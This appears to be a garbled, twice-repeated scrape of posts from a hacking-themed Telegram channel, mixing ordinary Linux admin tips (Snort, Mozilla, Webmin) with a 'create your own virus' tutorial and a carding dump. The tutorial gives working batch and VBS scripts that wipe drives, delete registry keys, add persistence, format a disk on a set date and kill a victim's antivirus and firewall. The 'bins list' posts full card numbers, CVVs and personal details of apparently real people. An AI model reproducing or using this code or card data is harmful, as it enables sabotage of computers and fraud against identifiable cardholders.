β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Network configuration-Prevent users from browsing using external proxies full by undercode
t.me/undercodeTesting
1. Some background knowledge:
(1) HTTP / 1.0 protocol defines web server and When the client uses a proxy, in the
HTTP request and response header, use Via: to identify the proxy server used to prevent the
server loop;
(2) snort is an open source IDS (intrusion detection system) that can be used Host or network IDS. With many IDS
rules, it can perform pattern recognition and matching on the captured (ip, tcp, udp, icmp) packets, and can generate corresponding records.
(3) libnet is open source software that can be used as a network protocol / packet generator.
(4) The TCP / IP network is a packet-switched network.
(5) Snort also has the function of generating IP packets using the libnet library. You can interrupt the TCP connection by issuing a TCP_RESET packet.
2. Prerequisites:
(1) Snort runs on the route (linux) or through the port mirror function of the switch, runs on the same
network segment of the route
3. Implementation:
(1) compile snort with flexresp (flex response) feature
(2) Define snort rules:
alert tcp $ HOME_NET any <> $ EXTER_NET 80 (msg: "block proxy"; uricontent: "Via:"; resp: rst_all;)
4 . Effect:
Internal network users can browse external websites normally. If the internal user βs browser is configured with an external proxy, the
HTTP REQUEST and RESPONSE headers will include Via: ... characters, and snort rules will capture this connection, and then
Send RST packets to client and server sockets. In this way, the TCP connection is terminated.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Network configuration-Prevent users from browsing using external proxies full by undercode
t.me/undercodeTesting
1. Some background knowledge:
(1) HTTP / 1.0 protocol defines web server and When the client uses a proxy, in the
HTTP request and response header, use Via: to identify the proxy server used to prevent the
server loop;
(2) snort is an open source IDS (intrusion detection system) that can be used Host or network IDS. With many IDS
rules, it can perform pattern recognition and matching on the captured (ip, tcp, udp, icmp) packets, and can generate corresponding records.
(3) libnet is open source software that can be used as a network protocol / packet generator.
(4) The TCP / IP network is a packet-switched network.
(5) Snort also has the function of generating IP packets using the libnet library. You can interrupt the TCP connection by issuing a TCP_RESET packet.
2. Prerequisites:
(1) Snort runs on the route (linux) or through the port mirror function of the switch, runs on the same
network segment of the route
3. Implementation:
(1) compile snort with flexresp (flex response) feature
(2) Define snort rules:
alert tcp $ HOME_NET any <> $ EXTER_NET 80 (msg: "block proxy"; uricontent: "Via:"; resp: rst_all;)
4 . Effect:
Internal network users can browse external websites normally. If the internal user βs browser is configured with an external proxy, the
HTTP REQUEST and RESPONSE headers will include Via: ... characters, and snort rules will capture this connection, and then
Send RST packets to client and server sockets. In this way, the TCP connection is terminated.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ xwindow-Turn off Mozilla's auto-install plugin dialog old versions & new one :
new version of the Mozilla browser in the linux environment, when the page appears within the browser When Mozilla does not support plugins by default, Mozilla will continuously pop up a confirmation dialog box for installing plugins.
γγFor the plug-ins we want to install by default, this function is really good, you can remind the installation, but for some plug-ins that you don't want to install at all, it is a bit annoying to always prompt like this.
The solution is very simple, just enter the mozilla plugin directory, the default is
/ usr / local / mozilla / plugins
to move the libnullplugin.so inside to any other directory, such as / opt / backup directory. Come here:
cd / usr / local / mozilla / plugins
mkdir / opt / backup
mv libnullplugin.so / opt / backup
Restart Mozilla after this operation is completed, when it is completed, it will prompt whether to close the prompt dialog box, select Yes can.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ xwindow-Turn off Mozilla's auto-install plugin dialog old versions & new one :
new version of the Mozilla browser in the linux environment, when the page appears within the browser When Mozilla does not support plugins by default, Mozilla will continuously pop up a confirmation dialog box for installing plugins.
γγFor the plug-ins we want to install by default, this function is really good, you can remind the installation, but for some plug-ins that you don't want to install at all, it is a bit annoying to always prompt like this.
The solution is very simple, just enter the mozilla plugin directory, the default is
/ usr / local / mozilla / plugins
to move the libnullplugin.so inside to any other directory, such as / opt / backup directory. Come here:
cd / usr / local / mozilla / plugins
mkdir / opt / backup
mv libnullplugin.so / opt / backup
Restart Mozilla after this operation is completed, when it is completed, it will prompt whether to close the prompt dialog box, select Yes can.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ shell-Can SHELL be used to query, modify, delete, etc. SQL
! # / Usr / bin / ksh
SQL_EXEC ()
{
sqlplus the USER $ / $ @ $ DB the PASSWD <<!
SET LINESIZE 1024
SET pageSize 1024
$ SQLCOMM
quit
!
}
#select
SQLCOMM = "SELECT 'XXX', username from the all_users;"
SQL_EXEC | grep XXX
#insert, Delete omitted
with What should I do if I cannot find sql_exec in INformIX?
I think this should work,
#vi query.sh
sqlplus $ USER / $ PASSWD << EOF
select β¦β¦ from β¦β¦β¦β¦
insert β¦β¦β¦β¦β¦β¦
delete β¦β¦β¦β¦β¦β¦
EOF
: wq
# query.sh
isql <<!
database dbname;
select * from tbname where fieldname="xxxxx";
delete from tbname;
.....
close database;
!
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ shell-Can SHELL be used to query, modify, delete, etc. SQL
! # / Usr / bin / ksh
SQL_EXEC ()
{
sqlplus the USER $ / $ @ $ DB the PASSWD <<!
SET LINESIZE 1024
SET pageSize 1024
$ SQLCOMM
quit
!
}
#select
SQLCOMM = "SELECT 'XXX', username from the all_users;"
SQL_EXEC | grep XXX
#insert, Delete omitted
with What should I do if I cannot find sql_exec in INformIX?
I think this should work,
#vi query.sh
sqlplus $ USER / $ PASSWD << EOF
select β¦β¦ from β¦β¦β¦β¦
insert β¦β¦β¦β¦β¦β¦
delete β¦β¦β¦β¦β¦β¦
EOF
: wq
# query.sh
isql <<!
database dbname;
select * from tbname where fieldname="xxxxx";
delete from tbname;
.....
close database;
!
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CREATE YOUR OWN VIRUS TUTORIAL :
t.me/undercodeTesting
IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it on your own risk. This coding is only for knowledge purpose.
All Scripts Here Are To Be Copied In Note Pad
π¦ This Virus Deletes All The Content Of A Driveβ¦
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code in a .bat file
>>Disable Internet Permanently
Save As A bat File
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
π¦ The Most Simple Virus To Crush The Window
@Echo off
Del C:\ *.* |y
Save It As Anything.bat
>> This Will Crash Ur Computer
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(βWscript.Shellβ)
Dim x
For x = 1 to 100000000
WSHShell.Run βTourstart.exeβ
Next
Save It As Anything.vbs
It Only Works With Windows XP
π¦ Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*
Code:-
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE
>>Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*
Code:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
>> Bomb Virus
Copy Paste The Following
If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit
And Save It As Anything.bat
Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day
>>Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*
Code:-
Set wshShell =wscript.CreateObject(βWScript.Shellβ)
do
wscript.sleep 100
wshshell.sendkeys β{CAPSLOCK}β
loop
>>Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*
Code:-
Set wshShell = wscript.CreateObject(βWScript.Shellβ)
do
wscript.sleep 100
wshshell.sendkeys β~(enter)β
loop
>>Endless Backspace
*This makes it so the backspace key is constantly being pressed*
Code:-
MsgBox βLetβs go back a few stepsβ
Set wshShell =wscript.CreateObject(βWScript.Shellβ)
do
wscript.sleep 100
wshshell.sendkeys β{bs}β
loop
What sex is your computer ?
-> open notepad
-> copy code
CreateObject(βSAPI.SpVoiceβ).SpeakβI love YOUβ
-> n paste on the Notepad
-> save as > love.vbs
-> double-click on it
Make Your Keyboard Disco Light
This trick just makes your keyboard lights do disco.
The script Iβm sharing with you, when executed makes your Caps, Num and Scroll Lockβs light flash in a cool rhythmic way!
1. This piece of code makes ur keyboard a live disco..
Set wshShell =wscript.CreateObject(βWScript.Shellβ)
do
wscript.sleep 100
wshshell.sendkeys β{CAPSLOCK}β
wshshell.sendkeys β{NUMLOCK}β
wshshell.sendkeys β{SCROLLLOCK}β
loop
2. This one makes it looks like a chain of lightβ¦.
Set wshShell =wscript.CreateObject(βWScript.Shellβ)
do
wscript.sleep 200
wshshell.sendkeys β{CAPSLOCK}β
wscript.sleep 100
wshshell.sendkeys β{NUMLOCK}β
wscript.sleep 50
wshshell.sendkeys β{SCROLLLOCK}β
loop
Instructions:
*paste any of the two above codes in notepad
*Save as βAnyFileNameβ.vbs
*Run the file
*To stop, launch task manager and then under βProcessesβ end βwscript.exeβ
I hope u would like it.. π
How To Disable Victim Antivirus
Open Notepad Copy it and Paste To Notepad
π¦CREATE YOUR OWN VIRUS TUTORIAL :
t.me/undercodeTesting
IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it on your own risk. This coding is only for knowledge purpose.
All Scripts Here Are To Be Copied In Note Pad
π¦ This Virus Deletes All The Content Of A Driveβ¦
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code in a .bat file
>>Disable Internet Permanently
Save As A bat File
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
π¦ The Most Simple Virus To Crush The Window
@Echo off
Del C:\ *.* |y
Save It As Anything.bat
>> This Will Crash Ur Computer
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(βWscript.Shellβ)
Dim x
For x = 1 to 100000000
WSHShell.Run βTourstart.exeβ
Next
Save It As Anything.vbs
It Only Works With Windows XP
π¦ Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*
Code:-
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE
>>Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*
Code:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
>> Bomb Virus
Copy Paste The Following
If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit
And Save It As Anything.bat
Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day
>>Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*
Code:-
Set wshShell =wscript.CreateObject(βWScript.Shellβ)
do
wscript.sleep 100
wshshell.sendkeys β{CAPSLOCK}β
loop
>>Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*
Code:-
Set wshShell = wscript.CreateObject(βWScript.Shellβ)
do
wscript.sleep 100
wshshell.sendkeys β~(enter)β
loop
>>Endless Backspace
*This makes it so the backspace key is constantly being pressed*
Code:-
MsgBox βLetβs go back a few stepsβ
Set wshShell =wscript.CreateObject(βWScript.Shellβ)
do
wscript.sleep 100
wshshell.sendkeys β{bs}β
loop
What sex is your computer ?
-> open notepad
-> copy code
CreateObject(βSAPI.SpVoiceβ).SpeakβI love YOUβ
-> n paste on the Notepad
-> save as > love.vbs
-> double-click on it
Make Your Keyboard Disco Light
This trick just makes your keyboard lights do disco.
The script Iβm sharing with you, when executed makes your Caps, Num and Scroll Lockβs light flash in a cool rhythmic way!
1. This piece of code makes ur keyboard a live disco..
Set wshShell =wscript.CreateObject(βWScript.Shellβ)
do
wscript.sleep 100
wshshell.sendkeys β{CAPSLOCK}β
wshshell.sendkeys β{NUMLOCK}β
wshshell.sendkeys β{SCROLLLOCK}β
loop
2. This one makes it looks like a chain of lightβ¦.
Set wshShell =wscript.CreateObject(βWScript.Shellβ)
do
wscript.sleep 200
wshshell.sendkeys β{CAPSLOCK}β
wscript.sleep 100
wshshell.sendkeys β{NUMLOCK}β
wscript.sleep 50
wshshell.sendkeys β{SCROLLLOCK}β
loop
Instructions:
*paste any of the two above codes in notepad
*Save as βAnyFileNameβ.vbs
*Run the file
*To stop, launch task manager and then under βProcessesβ end βwscript.exeβ
I hope u would like it.. π
How To Disable Victim Antivirus
Open Notepad Copy it and Paste To Notepad
@ echo off
rem β
rem Permanently Kill Anti-Virus
net stop βSecurity Centerβ
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tski
ll /A OUTPOST
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
rem β
rem Permanently Kill Anti-Virus
net stop βSecurity Centerβ
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tski
ll /A OUTPOST
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦NEW BINS LIST
> Bin Spotify 3 Months
Bin: 549627
ip: usa
Change country ph
BIN AMAZON PRIME VIDEO
497410702895xxxx
EXPIRY: rnd/2021
IP : France
ADDRESS: 48 bis Rue de Rivoli
City: Paris
State: Paris
ZIP: 75004
TELF: 33755xxxxxx
Send Screenshot in @Undercode_Testing
Bin Youtube Premium
553890259657xxxx
553890259638xxxx
553890259687xxxx
553890259538xxxx
553890259506xxxx
IP: India
Send Screenshot in @Undercode_Testing
CCnum:: 372765756775001
Cvv: 0815
Expm: 09
Expy: 23
Fname: Laurie
Lname: Murchison
Address: 305 Love Lane
City: WALL
State: NJ
Zip: 07719
Country: USA
Phone: 7329390707
CCnum:: 379654781301004
Cvv: 4745
Expm: 01
Expy: 22
Fname: Green
Lname: Cove
Address: 2200 Eller Dr. PO Box 13038
City: FORT LAUDERDALE
State: FL
Zip: 33316
Country: USA
Phone: 954-523-2200
CCnum:: 5178059822751047
Cvv: 179
Expm: 06
Expy: 22
Fname: Matthew
Lname: Flores
Address: 622 SE Washington Ave
City: CHEHALIS
State: WA
Zip: 98532
Country: USA
Phone: 2068511240
CCnum:: 4549516617390948
Cvv: 157
Expm: 05
Expy: 24Fname: Susana
Lname: Garca
Address: 330 Calle Santa Ines
City: ARECIBO
State:
Zip: 00612
Country: PUERTO RICO
Phone: 17879754789
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦NEW BINS LIST
> Bin Spotify 3 Months
Bin: 549627
ip: usa
Change country ph
BIN AMAZON PRIME VIDEO
497410702895xxxx
EXPIRY: rnd/2021
IP : France
ADDRESS: 48 bis Rue de Rivoli
City: Paris
State: Paris
ZIP: 75004
TELF: 33755xxxxxx
Send Screenshot in @Undercode_Testing
Bin Youtube Premium
553890259657xxxx
553890259638xxxx
553890259687xxxx
553890259538xxxx
553890259506xxxx
IP: India
Send Screenshot in @Undercode_Testing
CCnum:: 372765756775001
Cvv: 0815
Expm: 09
Expy: 23
Fname: Laurie
Lname: Murchison
Address: 305 Love Lane
City: WALL
State: NJ
Zip: 07719
Country: USA
Phone: 7329390707
CCnum:: 379654781301004
Cvv: 4745
Expm: 01
Expy: 22
Fname: Green
Lname: Cove
Address: 2200 Eller Dr. PO Box 13038
City: FORT LAUDERDALE
State: FL
Zip: 33316
Country: USA
Phone: 954-523-2200
CCnum:: 5178059822751047
Cvv: 179
Expm: 06
Expy: 22
Fname: Matthew
Lname: Flores
Address: 622 SE Washington Ave
City: CHEHALIS
State: WA
Zip: 98532
Country: USA
Phone: 2068511240
CCnum:: 4549516617390948
Cvv: 157
Expm: 05
Expy: 24Fname: Susana
Lname: Garca
Address: 330 Calle Santa Ines
City: ARECIBO
State:
Zip: 00612
Country: PUERTO RICO
Phone: 17879754789
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Network Configuration-Install Webmin full by undercode :
t.me/undercodeTesting
What is Webmin ?
Simply put, Webmin is a Web-based Unix system management tool. The administrator accesses various management functions of Webmin through a browser and completes corresponding management actions. Currently Webmin supports most Unix systems. In addition to various versions of Linux, these systems also include: AIX, HPUX, Solaris, Unixware, Irix, and FreeBSD.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Network Configuration-Install Webmin full by undercode :
t.me/undercodeTesting
What is Webmin ?
Simply put, Webmin is a Web-based Unix system management tool. The administrator accesses various management functions of Webmin through a browser and completes corresponding management actions. Currently Webmin supports most Unix systems. In addition to various versions of Linux, these systems also include: AIX, HPUX, Solaris, Unixware, Irix, and FreeBSD.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Compared with other GUI management tools, Webmin has the following significant advantages:
1) * Web management mode makes Webmin have both local and remote management capabilities;
2) * Plug-in structure makes Webmin has strong scalability and scalability. At present, the standard management module provided by Webmin almost covers common Unix management, and third-party management modules have also been continuously developed;
3) * Access control and SSL support provide sufficient security for remote management;
4) * Internationalization support, providing multi-language version
π¦ is installed Webmin
some linux distributions have been pre-installed Webmin, such as OpenLinux and soft Linux. If Webmin is not included in your Linux version, you can download Webmin's RPM package and TARBALL to install.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Compared with other GUI management tools, Webmin has the following significant advantages:
1) * Web management mode makes Webmin have both local and remote management capabilities;
2) * Plug-in structure makes Webmin has strong scalability and scalability. At present, the standard management module provided by Webmin almost covers common Unix management, and third-party management modules have also been continuously developed;
3) * Access control and SSL support provide sufficient security for remote management;
4) * Internationalization support, providing multi-language version
π¦ is installed Webmin
some linux distributions have been pre-installed Webmin, such as OpenLinux and soft Linux. If Webmin is not included in your Linux version, you can download Webmin's RPM package and TARBALL to install.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦The following are the installation steps of TAR BALL:
fb.com/undercodeTesting
1) * To install Webmin, you need to install perl5.0.6 or higher first. If perl is not installed on the target system, you need to download and install {perl-for-linux} from http://www.cpan.org, and you need to install commonly used perl modules; if you need Webmin to support SSL, you also need to install OpenSSL and perl modules Net :: SSLeay.
2) * Go to http://www.webmin.com/webmin to download webmin-0.91.tar.gz
3) * Unpack webmin-0.91.tar.gz to the directory where you want to install Webmin, such as / usr / local / webmin
4) * Run the installation script setup.pl. The installation process will ask the Webmin configuration file directory, Log directory and the system's listening port (default is 10000), and will also ask you to set an administrator password. The installation script also installs Webmin as the system's daemon, which starts automatically when the system is turned on.
5)* Restart the system and visit http: // localhost: 10000. If the login interface of Webmin appears, the installation is successful.
π¦ Webmin using UNIX system management
has already been said, all management functions are inserted in the form of a module in Webmin. Webmin categorizes various management modules. The main categories are: Webmin, systems, services, hardware and others. When you successfully log in and reach the homepage of Webmin, these categories will be displayed in front of you with different property pages. The following figure is the homepage of a Webmin server.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦The following are the installation steps of TAR BALL:
fb.com/undercodeTesting
1) * To install Webmin, you need to install perl5.0.6 or higher first. If perl is not installed on the target system, you need to download and install {perl-for-linux} from http://www.cpan.org, and you need to install commonly used perl modules; if you need Webmin to support SSL, you also need to install OpenSSL and perl modules Net :: SSLeay.
2) * Go to http://www.webmin.com/webmin to download webmin-0.91.tar.gz
3) * Unpack webmin-0.91.tar.gz to the directory where you want to install Webmin, such as / usr / local / webmin
4) * Run the installation script setup.pl. The installation process will ask the Webmin configuration file directory, Log directory and the system's listening port (default is 10000), and will also ask you to set an administrator password. The installation script also installs Webmin as the system's daemon, which starts automatically when the system is turned on.
5)* Restart the system and visit http: // localhost: 10000. If the login interface of Webmin appears, the installation is successful.
π¦ Webmin using UNIX system management
has already been said, all management functions are inserted in the form of a module in Webmin. Webmin categorizes various management modules. The main categories are: Webmin, systems, services, hardware and others. When you successfully log in and reach the homepage of Webmin, these categories will be displayed in front of you with different property pages. The following figure is the homepage of a Webmin server.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.